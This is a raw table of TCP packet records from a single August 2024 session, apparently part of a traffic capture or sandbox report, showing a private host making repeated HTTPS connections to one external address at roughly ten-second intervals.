Aug 26, 2024 15:33:37.670310020 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:37.670370102 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:37.892153978 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:37.892323017 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:37.892671108 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:37.892704964 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:37.892802000 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:37.892831087 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.137315035 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.137628078 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.137686014 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.137911081 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.137948990 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.137995005 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.138117075 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.138117075 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.138185024 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.138326883 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.138375998 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.138422012 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:38.138499975 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.138680935 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.138681889 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.449870110 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:38.449990034 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.198683023 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.198801994 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.199112892 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.199229956 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.199275970 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.418674946 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.418864965 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.419272900 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.419321060 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.419435978 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.419492006 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.667077065 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.667272091 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.667352915 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.667545080 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.667556047 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.667615891 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.667767048 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.667767048 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.667848110 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.668046951 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:48.668253899 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.668255091 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.668359995 CEST	49826	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:48.668426037 CEST	443	49826	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:58.743469000 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:58.743493080 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:58.743675947 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:58.743937969 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:58.743948936 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:58.953037024 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:58.953218937 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:58.953654051 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:58.953663111 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:58.954022884 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:58.954031944 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.198860884 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.198915958 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.198946953 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.198997021 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.199019909 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:59.199032068 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.199119091 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:59.199173927 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:59.199222088 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:59.199279070 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:59.199417114 CEST	49827	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:59.199429035 CEST	443	49827	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.225543976 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.225667000 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.225871086 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.226069927 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.226131916 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.446638107 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.446804047 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.447159052 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.447171926 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.447181940 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.447191000 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.694117069 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.694312096 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.694446087 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.694509983 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.694538116 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.694655895 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.694706917 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.694928885 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.694960117 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.695097923 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.695130110 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.695231915 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.695312023 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.695312023 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:09.695375919 CEST	443	49828	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:09.695395947 CEST	49828	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.738765955 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.738858938 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:19.739047050 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.739250898 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.739298105 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:19.958842993 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:19.959031105 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.959309101 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.959356070 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:19.959377050 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:19.959402084 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.207070112 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.207281113 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:20.207328081 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.207367897 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.207561970 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:20.207640886 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.207904100 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:20.207959890 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.207997084 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:20.208223104 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:20.208295107 CEST	49829	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:20.208353996 CEST	443	49829	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.252325058 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.252418995 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.252625942 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.252865076 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.252923012 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.464456081 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.464674950 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.465076923 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.465086937 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.465208054 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.465215921 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.714543104 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.714711905 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.714797974 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.715009928 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.715033054 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.715084076 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.715200901 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.715265036 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.715312004 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.715529919 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:30.715547085 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.715714931 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.715790033 CEST	49830	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:30.715850115 CEST	443	49830	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:40.781192064 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:40.781295061 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:40.781589985 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:40.781760931 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:40.781825066 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:40.994349003 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:40.994528055 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:40.994843006 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:40.994856119 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:40.995135069 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:40.995151997 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.251184940 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.251384020 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:41.251449108 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.251491070 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.251633883 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:41.251703024 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.251867056 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:41.251899958 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.251971960 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.252072096 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:41.252073050 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:41.252125978 CEST	443	49831	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:41.252222061 CEST	49831	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.310218096 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.310339928 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.310626030 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.310841084 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.310900927 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.527816057 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.528083086 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.528239965 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.528253078 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.528501987 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.528515100 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.795605898 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.795838118 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.795881033 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.795928955 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.796114922 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.796159983 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.796360970 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.796402931 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.796593904 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.796662092 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.796710014 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:34:51.796838045 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:51.796838045 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:52.105837107 CEST	49832	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:34:52.105963945 CEST	443	49832	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:01.870495081 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:01.870589018 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:01.870830059 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:01.871006012 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:01.871058941 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.090698957 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.090995073 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.091490030 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.091501951 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.091589928 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.091600895 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.339660883 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.339827061 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.339894056 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340087891 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.340120077 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340167046 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340262890 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.340322018 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.340368032 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340552092 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.340620041 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340679884 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340792894 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.340792894 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:02.340878963 CEST	443	49833	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:02.340950966 CEST	49833	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.399355888 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.399476051 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.399729013 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.399951935 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.400011063 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.618773937 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.619009018 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.619539976 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.619553089 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.619627953 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.619640112 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.874613047 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.874766111 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.874840975 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.874845028 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.874855995 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.874965906 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.874995947 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.874995947 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.875006914 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.875062943 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:12.875168085 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.875219107 CEST	49834	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:12.875228882 CEST	443	49834	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:22.912717104 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:22.912812948 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:22.912957907 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:22.913220882 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:22.913264036 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.152525902 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.152749062 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.152956963 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.152971029 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.153203964 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.153224945 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.403687000 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.403912067 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.404256105 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.404340029 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.404406071 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.404433012 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.404486895 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.404508114 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.404552937 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.404674053 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:23.404731989 CEST	443	49835	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:23.404757977 CEST	49835	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.457928896 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.458050966 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.458328009 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.458446980 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.458492994 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.673587084 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.673831940 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.674132109 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.674143076 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.674236059 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.674248934 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.923173904 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.923384905 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.923455000 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.923512936 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.923589945 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.923666000 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.923784971 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.923827887 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.923852921 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.924014091 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:33.924144983 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.924290895 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.924336910 CEST	49836	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:33.924377918 CEST	443	49836	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:43.955019951 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:43.955141068 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:43.955389023 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:43.955566883 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:43.955615044 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.175247908 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.175518036 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.175795078 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.175832987 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.175937891 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.176000118 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.422889948 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.423083067 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.423149109 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.423312902 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.423356056 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.423382998 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.423542023 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.423572063 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.423729897 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.423770905 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:44.423993111 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.424063921 CEST	49837	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:44.424114943 CEST	443	49837	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.483999968 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.484122038 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.484386921 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.484638929 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.484704018 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.705614090 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.705784082 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.706073046 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.706111908 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.706175089 CEST	49838	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:35:54.706198931 CEST	443	49838	172.67.207.219	192.168.11.20
Aug 26, 2024 15:35:54.951853037 CEST	443	49838	172.67.207.219	192.168.11.20
